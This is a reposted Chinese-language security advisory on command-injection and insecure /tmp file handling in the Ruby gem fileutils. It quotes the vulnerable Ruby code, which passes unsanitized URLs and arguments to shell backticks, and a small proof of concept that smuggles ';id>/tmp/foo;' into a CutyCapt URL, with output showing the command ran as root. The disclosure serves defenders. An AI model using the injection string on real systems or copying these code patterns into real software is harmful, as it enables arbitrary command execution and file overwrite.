utils.rb'远程命令执行漏洞

发布日期:2013-02-23
更新日期:2013-03-02

受影响系统:
rubygems Fileutils
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58223

RubyGems Fileutils是一组工具,可提取各种文件类型的元数据。

Fileutils对传递到CutyCapt的输入没有正确过滤,在实现上存在多个远程命令执行漏洞,同时/tmp还存在不安全文件处理。本地攻击者可利用此漏洞执行任意命令。

<*来源:Larry W. Cashdollar (lwc@vapid.dhs.org)
 
  链接:
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Possible remote command execution and insecure file handling in /tmp.
2/23/2013

"A set of utility classes to extract meta data from different file types".

Handles files insecurely in /tmp, a directory is created for that file extension say 'zip' and files are maniplated there. This directory can be hijacked and the contents manipulated by a malicious user.

in ./lib/file_utils.rb

15    def zip (target, *sources)
16        targetdir = "{FileUtils::Config.tmp_dir}/zip"
17        id = 1
18        while File.exists?(targetdir)
19            targetdir = "{FileUtils::Config.tmp_dir}/zip#{id}"
20            id += 1
21        end
22        FileUtils.mkdir(targetdir)

where Config.tmp_dir = /tmp

in ./lib/file_utils/config.rb

5        def self.tmp_dir
  6            @tmp_dir ||= '/tmp'
  7        end

Remote command execution:

From file_utils.rb, doesn't sanitize input on URLs passed to CutyCapt for execution. If a URL contains shell characters say a ';' followed by a command a remote attacker execute a command on the clients system if they are enticed to click an encoded url like:

need to test URL encoding not sure if this is valid.

;id>/tmp/o; ->

7    def capture (url, target)
  8        command = FileUtils::Config::Xvfb.command(File.dirname(__FILE__) + "/../bin/CutyCapt --min-width=1024 --min-height=768 --url={url} --out={target}")
  9        `#{command}`
10    end

partial PoC if client is tricked into using malicious URL:

irb(main):001:0> `xvfb-run --server-args="-screen 0,1024x768x24" ./CutyCapt --url=http://www.example.org;id>/tmp/foo; --out=/tmp/tempf` xvfb-run: error: Xvfb failed to start
sh: 1: --out=/tmp/tempf: not found
=> ""
irb(main):002:0>

root@Ubuntu:~/CutyCapt/cutycapt/CutyCapt ls -l /tmp/foo -rw-r--r-- 1 root root 39 Feb 27 02:56 /tmp/foo root@ubuntu:~/CutyCapt/cutycapt/CutyCapt cat /tmp/foo uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt#

Michael Scherer of RedHat.com found other issues during a discussion about the above issues I found:

In fact, there is the same similar problem in another file :
result = `#{FileUtils::Config::OpenOffice.python} #{command} #{source} #{target} #{FileUtils::Config::OpenOffice.port}`

I quickly checked using irb ( a quick command line to type ruby snippet, and yes, using funky chars result in funky results.

There is another issue in
# Generates a temp filepath for the given extension def temp (extension)

path = "{FileUtils::Config.tmp_dir}/tmp.{extension}" id = 1
while File.exists?(path)

path = "{FileUtils::Config.tmp_dir}/tmp.{id}.#{extension}"
        id += 1

end

Since someone could just create the file at the last moment, and make a link so the script would overwrite an arbitrary file.

Thanks to vl4dz and Michael.

Larry W. Cashdollar @_larry0
&#65279;

建议:
--------------------------------------------------------------------------------
厂商补丁:

rubygems
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

https://rubygems.org/gems/fileutils

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wywgdw.html